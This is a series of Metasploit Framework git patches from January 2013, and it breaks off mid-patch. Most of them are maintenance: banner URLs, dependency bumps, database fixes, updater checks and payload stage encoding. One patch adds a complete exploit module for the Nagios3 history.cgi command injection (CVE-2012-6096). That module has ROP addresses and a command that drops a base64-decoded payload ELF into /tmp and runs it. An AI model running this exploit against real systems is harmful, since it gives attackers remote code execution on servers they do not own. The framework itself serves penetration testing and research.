-%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% -%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% -%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% -%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% -%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% - From 950902f85606d1b80a934c7ab0f17b46c247f2f3 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 22:33:30 -0600 Subject: [PATCH 018/421] Add a tasteful URL to some banners. --- lib/msf/ui/logos/3kom-superhack.txt | 1 + lib/msf/ui/logos/metasploit-shield.txt | 3 +-- lib/msf/ui/logos/missile-command.txt | 1 + lib/msf/ui/logos/ninja.txt | 2 ++ lib/msf/ui/logos/r7-metasploit.txt | 2 +- lib/msf/ui/logos/wake-up-neo.txt | 3 ++- 6 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt index a2097f972ae0..4d1123f35429 100644 --- a/lib/msf/ui/logos/3kom-superhack.txt +++ b/lib/msf/ui/logos/3kom-superhack.txt @@ -15,5 +15,6 @@ | %bld[ OK ]%clr | |______________________________________________________________________________| | | +| http://metasploit.pro | |______________________________________________________________________________| %clr diff --git a/lib/msf/ui/logos/metasploit-shield.txt b/lib/msf/ui/logos/metasploit-shield.txt index 7f8648754fe2..41f1d971c724 100644 --- a/lib/msf/ui/logos/metasploit-shield.txt +++ b/lib/msf/ui/logos/metasploit-shield.txt @@ -18,5 +18,4 @@ %bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr %bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr %bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr -%clr - +%clr%bld http://metasploit.pro diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt index 1eda5e790a2e..aedd60471100 100644 --- a/lib/msf/ui/logos/missile-command.txt +++ b/lib/msf/ui/logos/missile-command.txt @@ -27,4 +27,5 @@ ################################################################################ # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # ################################################################################ + http://metasploit.pro %clr diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt index d5aff31eb227..9bc984822b9f 100644 --- a/lib/msf/ui/logos/ninja.txt +++ b/lib/msf/ui/logos/ninja.txt @@ -27,5 +27,7 @@ # # ### # # ## ######################## ## ## ## ## + + http://metasploit.pro %clr diff --git a/lib/msf/ui/logos/r7-metasploit.txt b/lib/msf/ui/logos/r7-metasploit.txt index ca62faacf8e8..f65028259727 100644 --- a/lib/msf/ui/logos/r7-metasploit.txt +++ b/lib/msf/ui/logos/r7-metasploit.txt @@ -1,7 +1,7 @@ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt index e5606e1abdd0..2f9fd96793b0 100644 --- a/lib/msf/ui/logos/wake-up-neo.txt +++ b/lib/msf/ui/logos/wake-up-neo.txt @@ -22,4 +22,5 @@ `._ , ' /_ ; ,''-,;' ``- ``-..__``--` -%clr + + http://metasploit.pro%clr From f8e1ccc27eac4e0ee4b56cb666fe5e67b5023d43 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 10 Jan 2013 17:50:00 -0600 Subject: [PATCH 019/421] Remove cred_files migration [#41837027] Mdm::CredFile is only used in Pro, so for metasploit_data_models 0.4.0, Mdm::CredFiles has been moved to Pro, so the migration has been moved to Pro too. --- Gemfile | 4 +--- Gemfile.lock | 21 +++++++++---------- .../20110608113500_add_cred_file_table.rb | 20 ------------------ 3 files changed, 11 insertions(+), 34 deletions(-) delete mode 100755 data/sql/migrate/20110608113500_add_cred_file_table.rb diff --git a/Gemfile b/Gemfile index 0bb1135b0bf7..502e0060b3cc 100755 --- a/Gemfile +++ b/Gemfile @@ -2,10 +2,8 @@ source 'http://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' -# Needed for Msf::DbManager -gem 'activerecord' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' group :development do # Markdown formatting for yard diff --git a/Gemfile.lock b/Gemfile.lock index a9531cb60126..99f60b664ded 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,10 +1,10 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 73f26789500f278dd6fd555e839d09a3b81a05f4 - tag: 0.3.0 + revision: 448c1065329efea1eac76a3897f626f122666743 + tag: 0.4.0 specs: - metasploit_data_models (0.3.0) - activerecord + metasploit_data_models (0.4.0) + activerecord (>= 3.2.10) activesupport pg pry @@ -12,15 +12,15 @@ GIT GEM remote: http://rubygems.org/ specs: - activemodel (3.2.9) - activesupport (= 3.2.9) + activemodel (3.2.11) + activesupport (= 3.2.11) builder (~> 3.0.0) - activerecord (3.2.9) - activemodel (= 3.2.9) - activesupport (= 3.2.9) + activerecord (3.2.11) + activemodel (= 3.2.11) + activesupport (= 3.2.11) arel (~> 3.0.2) tzinfo (~> 0.3.29) - activesupport (3.2.9) + activesupport (3.2.11) i18n (~> 0.6) multi_json (~> 1.0) arel (3.0.2) @@ -57,7 +57,6 @@ PLATFORMS ruby DEPENDENCIES - activerecord activesupport (>= 3.0.0) metasploit_data_models! rake diff --git a/data/sql/migrate/20110608113500_add_cred_file_table.rb b/data/sql/migrate/20110608113500_add_cred_file_table.rb deleted file mode 100755 index 9780e261e780..000000000000 --- a/data/sql/migrate/20110608113500_add_cred_file_table.rb +++ /dev/null @@ -1,20 +0,0 @@ -class AddCredFileTable < ActiveRecord::Migration - - def self.up - create_table :cred_files do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :path, :limit => 1024 - t.string :ftype, :limit => 16 - t.string :created_by - t.string :name, :limit => 512 - t.string :desc, :limit => 1024 - - t.timestamps - end - end - - def self.down - drop_table :cred_files - end - -end From aa36b65aeee8b8e5cfb05fc69c68536450c19731 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 11 Jan 2013 01:10:56 -0600 Subject: [PATCH 020/421] [FixRM #7673] "Failed to reload" error. When db_disconnect is issued, this funtion does not update the status of self.migrated to false. So when another reload command is used, the update_module_details function will still try to connect to the database, which causes the "Failed to reload" error. --- lib/msf/core/db_manager.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index f564ea3ef3b9..f78a8cb7d0d1 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -268,6 +268,7 @@ def create_db(opts) def disconnect begin ActiveRecord::Base.remove_connection + self.migrated = false rescue ::Exception => e self.error = e elog("DB.disconnect threw an exception: #{e}") From b388f2357c5a35da27938fcfa052c8273b5dd71f Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 12 Jan 2013 00:08:30 -0600 Subject: [PATCH 021/421] Reset modules_cached flag when database disconnects --- lib/msf/core/db_manager.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index f78a8cb7d0d1..914d126c7103 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -269,6 +269,7 @@ def disconnect begin ActiveRecord::Base.remove_connection self.migrated = false + self.modules_cached = false rescue ::Exception => e self.error = e elog("DB.disconnect threw an exception: #{e}") From 2f2a5c1d475337cc58a45d2b7e6bc7d70ca78a62 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 12 Jan 2013 01:43:40 -0600 Subject: [PATCH 022/421] [FixRM: #2100] Rescue TerminateLineInput in irb In irb, when you hit ^c, you will get an ugly backtrace. This fix handles that exception. --- lib/rex/ui/text/irb_shell.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb index 10cd345a6535..c5bb82c7328f 100644 --- a/lib/rex/ui/text/irb_shell.rb +++ b/lib/rex/ui/text/irb_shell.rb @@ -41,7 +41,11 @@ def run # Trap interrupt old_sigint = trap("SIGINT") do - irb.signal_handle + begin + irb.signal_handle + rescue RubyLex::TerminateLineInput + print ">> " + end end # Keep processing input until the cows come home... From 90b0a7035b35eb4af73845462b6170ea24eb05a0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 13 Jan 2013 13:24:48 -0600 Subject: [PATCH 023/421] Recover the prompt again --- lib/rex/ui/text/irb_shell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb index c5bb82c7328f..e7d6baf72eb5 100644 --- a/lib/rex/ui/text/irb_shell.rb +++ b/lib/rex/ui/text/irb_shell.rb @@ -44,7 +44,7 @@ def run begin irb.signal_handle rescue RubyLex::TerminateLineInput - print ">> " + irb.eval_input end end From b3b68c1b90df96128c6768fae4fe6cd9cd9f9f10 Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 13 Jan 2013 21:07:39 -0600 Subject: [PATCH 024/421] Make stage encoding possible * Fixes a bug in shikata where input greater than 0xffff length would still use 16-bit counter * Short circuits finding bad xor keys if there are no bad characters to avoid * Fixes huge performance issue with large inputs to xor-based encoders due to the use of String#+ instead of String#<< in a loop. It now takes ~3 seconds on modern hardware to encode a 750kB buffer with shikata where it used to take more than 10 minutes. The decoding side takes a similar amount of time and will increase the wait between sending the second stage and opening a usable session by several seconds. I believe this addresses the intent of pull request 905 [See #905] --- lib/msf/core/encoder.rb | 7 +++- lib/msf/core/encoder/xor.rb | 3 ++ lib/msf/core/payload/stager.rb | 37 +++++++++++++++---- lib/msf/ui/console/command_dispatcher/core.rb | 1 + modules/encoders/x86/shikata_ga_nai.rb | 12 +++--- 5 files changed, 47 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index b1b17cab23d4..b8ebff5635a4 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -308,7 +308,12 @@ def do_encode(state) while (offset < state.buf.length) block = state.buf[offset, decoder_block_size] - state.encoded += encode_block(state, + # Append here (String#<<) instead of creating a new string with + # String#+ because the allocations kill performance with large + # buffers. This isn't usually noticeable on most shellcode, but + # when doing stage encoding on meterpreter (~750k bytes) the + # difference is 2 orders of magnitude. + state.encoded << encode_block(state, block + ("\x00" * (decoder_block_size - block.length))) offset += decoder_block_size diff --git a/lib/msf/core/encoder/xor.rb b/lib/msf/core/encoder/xor.rb index 69b6db7d3079..4c351ac45e85 100644 --- a/lib/msf/core/encoder/xor.rb +++ b/lib/msf/core/encoder/xor.rb @@ -26,6 +26,9 @@ def encode_block(state, block) # Finds keys that are incompatible with the supplied bad character list. # def find_bad_keys(buf, badchars) + # Short circuit if there are no badchars + return super if badchars.length == 0 + bad_keys = Array.new(decoder_key_size) { Hash.new } byte_idx = 0 diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 45674bc0f10e..7a66ae32038f 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'msf/core' +require 'msf/core/option_container' ### # @@ -8,6 +9,17 @@ ### module Msf::Payload::Stager + def initialize(info={}) + super + + register_advanced_options( + [ + Msf::OptBool.new("EnableStageEncoding", [ false, "Encode the second stage payload", false ]), + Msf::OptString.new("StageEncoder", [ false, "Encoder to use if EnableStageEncoding is set", nil ]), + ], Msf::Payload::Stager) + + end + # # Sets the payload type to a stager. # @@ -65,6 +77,11 @@ def stage_over_connection? true end + def encode_stage? + # Convert to string in case it hasn't been normalized + !!(datastore['EnableStageEncoding'].to_s == "true") + end + # # Generates the stage payload and substitutes all offsets. # @@ -75,8 +92,8 @@ def generate_stage # Substitute variables in the stage substitute_vars(p, stage_offsets) if (stage_offsets) - # Encode the stage of stage encoding is enabled - #p = encode_stage(p) + # Encode the stage if stage encoding is enabled + p = encode_stage(p) return p end @@ -101,14 +118,15 @@ def handle_connection(conn, opts={}) p = (self.stage_prefix || '') + p end + sending_msg = "Sending #{encode_stage? ? "encoded ":""}stage" + sending_msg << " (#{p.length} bytes)" # The connection should always have a peerhost (even if it's a # tunnel), but if it doesn't, erroring out here means losing the # session, so make sure it does, just to be safe. if conn.respond_to? :peerhost - print_status("Sending stage (#{p.length} bytes) to #{conn.peerhost}") - else - print_status("Sending stage (#{p.length} bytes)") + sending_msg << " to #{conn.peerhost}" end + print_status(sending_msg) # Send the stage conn.put(p) @@ -146,15 +164,20 @@ def handle_intermediate_stage(conn, payload) # Encodes the stage prior to transmission def encode_stage(stg) + return stg unless encode_stage? - # If DisableStageEncoding is set, we do not encode the stage - return stg if datastore['DisableStageEncoding'] =~ /^(y|1|t)/i + if datastore["StageEncoder"].nil? or datastore["StageEncoder"].empty? + stage_enc_mod = nil + else + stage_enc_mod = datastore["StageEncoder"] + end # Generate an encoded version of the stage. We tell the encoding system # to save edi to ensure that it does not get clobbered. encp = Msf::EncodedPayload.create( self, 'Raw' => stg, + 'Encoder' => stage_enc_mod, 'SaveRegisters' => ['edi'], 'ForceEncode' => true) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e1d17f3d92b2..b1deb090582a 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2365,6 +2365,7 @@ def tab_complete_option(str, words) return option_values_payloads() if opt.upcase == 'PAYLOAD' return option_values_targets() if opt.upcase == 'TARGET' return option_values_nops() if opt.upcase == 'NOPS' + return option_values_encoders() if opt.upcase == 'StageEncoder' end # Well-known option names specific to auxiliaries diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 6cfeec98ea41..ffc602db844b 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -111,10 +111,10 @@ def generate_shikata_block(state, length, cutoff) # Clear the counter register clear_register = Rex::Poly::LogicalBlock.new('clear_register', - "\x31\xc9", - "\x29\xc9", - "\x33\xc9", - "\x2b\xc9") + "\x31\xc9", # xor ecx,ecx + "\x29\xc9", # sub ecx,ecx + "\x33\xc9", # xor ecx,ecx + "\x2b\xc9") # sub ecx,ecx # Initialize the counter after zeroing it init_counter = Rex::Poly::LogicalBlock.new('init_counter') @@ -126,8 +126,10 @@ def generate_shikata_block(state, length, cutoff) if (length <= 255) init_counter.add_perm("\xb1" + [ length ].pack('C')) - else + elsif (length <= 65536) init_counter.add_perm("\x66\xb9" + [ length ].pack('v')) + else + init_counter.add_perm("\xb9" + [ length ].pack('V')) end # Key initialization block From 04b35a38ff0ba66a9d00f304a50b8c23c39faa94 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jan 2013 14:59:32 -0600 Subject: [PATCH 025/421] Update MSB ref --- modules/exploits/windows/browser/ie_cbutton_uaf.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 8b36b5e4a211..7aa41c04fe60 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -48,6 +48,7 @@ def initialize(info={}) [ 'CVE', '2012-4792' ], [ 'US-CERT-VU', '154201' ], [ 'BID', '57070' ], + [ 'MSB', 'MS13-008' ], [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], From db4a392de2b068eeb2768beaad89110e46d09c65 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 14 Jan 2013 13:58:16 -0800 Subject: [PATCH 026/421] Msfupdate should check for installation validity This fix will allow people to at least solve their own msfupdate problems by registering for Community Edition. [SeeRM #7690] --- msfupdate | 35 +++++++++++++++++++++++++++++------ 1 file changed, 29 insertions(+), 6 deletions(-) diff --git a/msfupdate b/msfupdate index be7f75dee586..df8ae19395a3 100755 --- a/msfupdate +++ b/msfupdate @@ -24,11 +24,13 @@ $stderr.puts "[*]" $stderr.puts "" if not (Process.uid == 0 or File.stat(msfbase).owned?) - $stderr.puts "[-] ERROR: User running msfupdate does not own the metasploit install" - $stderr.puts "Please run msfupdate as the same user who installed metasploit." + $stderr.puts "[-] ERROR: User running msfupdate does not own the Metasploit installation" + $stderr.puts "[-] Please run msfupdate as the same user who installed Metasploit." + exit 0x10 end -def is_pro +# Are you an installer, or did you get here via a source checkout? +def is_installed File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) end @@ -147,12 +149,33 @@ if is_git system("git", "merge", "#{remote}/#{branch}") end -if is_pro +if is_installed update_script = File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb")) - system("ruby", update_script) + product_key = File.expand_path(File.join(@msfbase_dir, "..", "engine", "license", "product.key")) + if File.exists? product_key + if File.readable? product_key + system("ruby", update_script) + else + $stdout.puts "[-] ERROR: Failed to update Metasploit installation" + $stdout.puts "" + $stdout.puts "[-] You must be able to read the product key for the" + $stdout.puts "[-] Metasploit installation in order to run msfupdate." + $stdout.puts "[-] Usually, this means you must be root (EUID 0)." + exit 0x10 + end + else + $stdout.puts "[-] ERROR: Failed to update Metasploit installation" + $stdout.puts "" + $stdout.puts "[-] In order to update your Metasploit installation," + $stdout.puts "[-] you must first register it through the UI, here:" + $stderr.puts "[-] https://localhost:3790 (note, Metasploit Community" + $stderr.puts "[-] Edition is totally free and takes just a few seconds" + $stderr.puts "[-] to register!)" + exit 0x11 + end end -unless is_svn || is_git || is_pro +unless is_svn || is_git || is_installed raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'" end From 279a61d0f4f6d6128902d22d0da45d828e11a68f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 14 Jan 2013 14:26:42 -0800 Subject: [PATCH 027/421] Add the optional pause for Windows --- msfupdate | 27 +++++++++++++++++---------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/msfupdate b/msfupdate index df8ae19395a3..058fd8f51eaa 100755 --- a/msfupdate +++ b/msfupdate @@ -23,6 +23,7 @@ $stderr.puts "[*] Attempting to update the Metasploit Framework..." $stderr.puts "[*]" $stderr.puts "" +# Bail right away, no waiting around for consoles. if not (Process.uid == 0 or File.stat(msfbase).owned?) $stderr.puts "[-] ERROR: User running msfupdate does not own the Metasploit installation" $stderr.puts "[-] Please run msfupdate as the same user who installed Metasploit." @@ -58,6 +59,16 @@ def print_deprecation_warning $stdout.puts "[*] Please adjust your egress firewall rules accordingly." end +def maybe_wait_and_exit(exit_code=0) + if @actually_wait + $stdout.puts "" + $stdout.puts "[*] Please hit enter to exit" + $stdout.puts "" + $stdin.readline + exit exit_code + end +end + # Some of these args are meaningful for SVN, some for Git, # some for both. Fun times. @args.each_with_index do |arg,i| @@ -104,7 +115,7 @@ if is_svn $stderr.puts "[-] If you used a binary installer, make sure you run the symlink in" $stderr.puts "[-] /usr/local/bin instead of running this file directly (e.g.: ./msfupdate)" $stderr.puts "[-] to ensure a proper environment." - exit 1 + maybe_wait_and_exit 1 else # Cleanup worked, go ahead and update system("svn", "update", *@args) @@ -136,7 +147,7 @@ if is_git $stderr.puts "[-] If you used a binary installer, make sure you run the symlink in" $stderr.puts "[-] /usr/local/bin instead of running this file directly (e.g.: ./msfupdate)" $stderr.puts "[-] to ensure a proper environment." - exit 1 + maybe_wait_and_exit 1 elsif not committed system("git", "stash") $stdout.puts "[*] Stashed local changes to avoid merge conflicts." @@ -161,7 +172,7 @@ if is_installed $stdout.puts "[-] You must be able to read the product key for the" $stdout.puts "[-] Metasploit installation in order to run msfupdate." $stdout.puts "[-] Usually, this means you must be root (EUID 0)." - exit 0x10 + maybe_wait_and_exit 10 end else $stdout.puts "[-] ERROR: Failed to update Metasploit installation" @@ -171,7 +182,7 @@ if is_installed $stderr.puts "[-] https://localhost:3790 (note, Metasploit Community" $stderr.puts "[-] Edition is totally free and takes just a few seconds" $stderr.puts "[-] to register!)" - exit 0x11 + maybe_wait_and_exit 11 end end @@ -179,9 +190,5 @@ unless is_svn || is_git || is_installed raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'" end -if @actually_wait - $stderr.puts "" - $stderr.puts "[*] Please hit enter to exit" - $stderr.puts "" - $stdin.readline -end +maybe_wait_and_exit(0) + From 18f81fd6f47e9b03932e85846e614f62db61905f Mon Sep 17 00:00:00 2001 From: Jose Selvi Date: Tue, 15 Jan 2013 15:32:32 +0100 Subject: [PATCH 028/421] Nagios3 history.cgi exploit --- .../unix/webapp/nagios3_history_cgi.rb | 211 ++++++++++++++++++ 1 file changed, 211 insertions(+) create mode 100644 modules/exploits/unix/webapp/nagios3_history_cgi.rb diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb new file mode 100644 index 000000000000..c8c0cfb39f94 --- /dev/null +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -0,0 +1,211 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nagios3 history.cgi Host Command Execution', + 'Description' => %q{ + This module abuses a command injection vulnerability in the + Nagios3 history.cgi script. + }, + 'Author' => [ + 'Anonymous ', # Original finding + 'blasty ', # First working exploit + 'Jose Selvi ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6096' ], + [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ], + [ 'URL', 'http://pastebin.com/FJUNyTaj' ], + ], + 'Platform' => ['unix', 'linux'], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 200, # Due to a system() parameter length limitation + 'BadChars' => '', # It'll be base64 encoded + }, + 'Targets' => + [ + [ 'Automatic Target', { 'auto' => true }], + # NOTE: All addresses are from the history.cgi binary + [ 'CentOS (nagios-3.4.3-1.el6.i686.rpm)', + { + 'BannerRE' => 'CentOS', + 'VersionRE' => '3.4.3', + 'Arch' => ARCH_X86, + 'Offset' => 0xc43, + 'RopStack' => + [ + 0x0804c260, # unescape_cgi_input() + 0x08048f04, # pop, ret + 0x08079b60, # buffer addr + 0x08048bb0, # system() + 0x08048e70, # exit() + 0x08079b60 # buffer addr + ] + } + ], + [ 'Debian (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. + { + 'BannerRE' => 'Debian', + 'VersionRE' => '3.3.0', + 'Arch' => ARCH_X86, + 'Offset' => 0xc37, + 'RopStack' => + [ + 0x0804b620, # unescape_cgi_input() + 0x08048fe4, # pop, ret + 0x080727a0, # buffer addr + 0x08048c7c, # system() + 0xdeafbabe, # if should be exit() but it's not + 0x080727a0 # buffer addr + ] + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 09 2012')) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), + OptString.new('USER', [false, "The username to authenticate with", "guest"]), + OptString.new('PASS', [false, "The password to authenticate with", "guest"]), + ], self.class) + end + + def detect_version(uri) + # Send request + res = send_request_raw({ + 'uri' => uri, + 'method' => 'GET', + }, 90) + + # Detection unknown if error + if res.nil? + print_error("Unable to get a response from the server") + return nil, nil + end + + # Extract banner from response + banner = res.headers['Server'] + + # Version undetected by now - String = "Nagios® Core™ 3.4.1 -" + version = nil + + return version, banner + end + + def exploit + uri = normalize_uri(datastore['URI']) + + # Automatic Targeting + mytarget = nil + if (target['auto']) + print_status("Automatically detecting the target...") + + # Get version information + version, banner = detect_version(uri) + if not banner.nil? + print_status("Web Server banner: #{banner}") + end + if not version.nil? + print_status("Nagios version detected: #{version}") + end + + # No banner, no target + if banner.nil? + fail_with(Exploit::Failure::NoTarget, "No matching target") + end + + # Try regex for each target + self.targets.each do |t| + if t['BannerRE'].nil? # It doesn't exist in Auto Target + next + end + regexp = Regexp.escape(t['BannerRE']) + if ( banner =~ /#{regexp}/ ) then + mytarget = t + break + end + end + + if mytarget.nil? + fail_with(Exploit::Failure::NoTarget, "No matching target") + end + else + mytarget = target + end + + print_status("Selected Target: #{mytarget.name}") + print_status("Sending request to http://#{rhost}:#{rport}#{uri}") + + # Generate a payload ELF to execute + elfbin = generate_payload_exe + elfb64 = Rex::Text.encode_base64(elfbin) + + # Generate random filename + tempfile = '/tmp/' + rand_text_alphanumeric(10) + + # Generate command-line execution + cmd = 'echo ' + elfb64 + '|base64 -d|tee ' + tempfile + ';chmod 700 ' + tempfile + ';rm -rf ' + tempfile + '|' + tempfile + ';' + host_value = cmd.gsub!(' ', '${IFS}') + + # Generate 'host' parameter value + padding_size = mytarget['Offset'] - host_value.length + host_value << rand_text_alphanumeric( padding_size ) + + # Generate ROP + host_value << mytarget['RopStack'].pack('V*') + + # Send exploit + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, + 'vars_get' => + { + 'host' => host_value + } + }, 10) + + if(not res) + if session_created? + print_status("Session created, enjoy!") + else + print_error("No response from the server") + end + return + end + + if(res.code == 401) + print_error("Please specify correct values for USER and PASS") + return + end + + if(res.code == 404) + print_error("Please specify the correct path to history.cgi in the URI parameter") + return + end + + print_status("Unknown response") + end + +end From d36e38fca61b2eceeaa208304047bbf348ceebcd Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Jan 2013 10:34:31 -0600 Subject: [PATCH 029/421] Move encoding into handle_connection * Allows payloads that override generate_stage to still take advantage of stage encoding * Also adds doc comments for a few methods --- lib/msf/core/encoded_payload.rb | 6 +++-- lib/msf/core/payload/stager.rb | 41 ++++++++++++++++++++++++++++----- 2 files 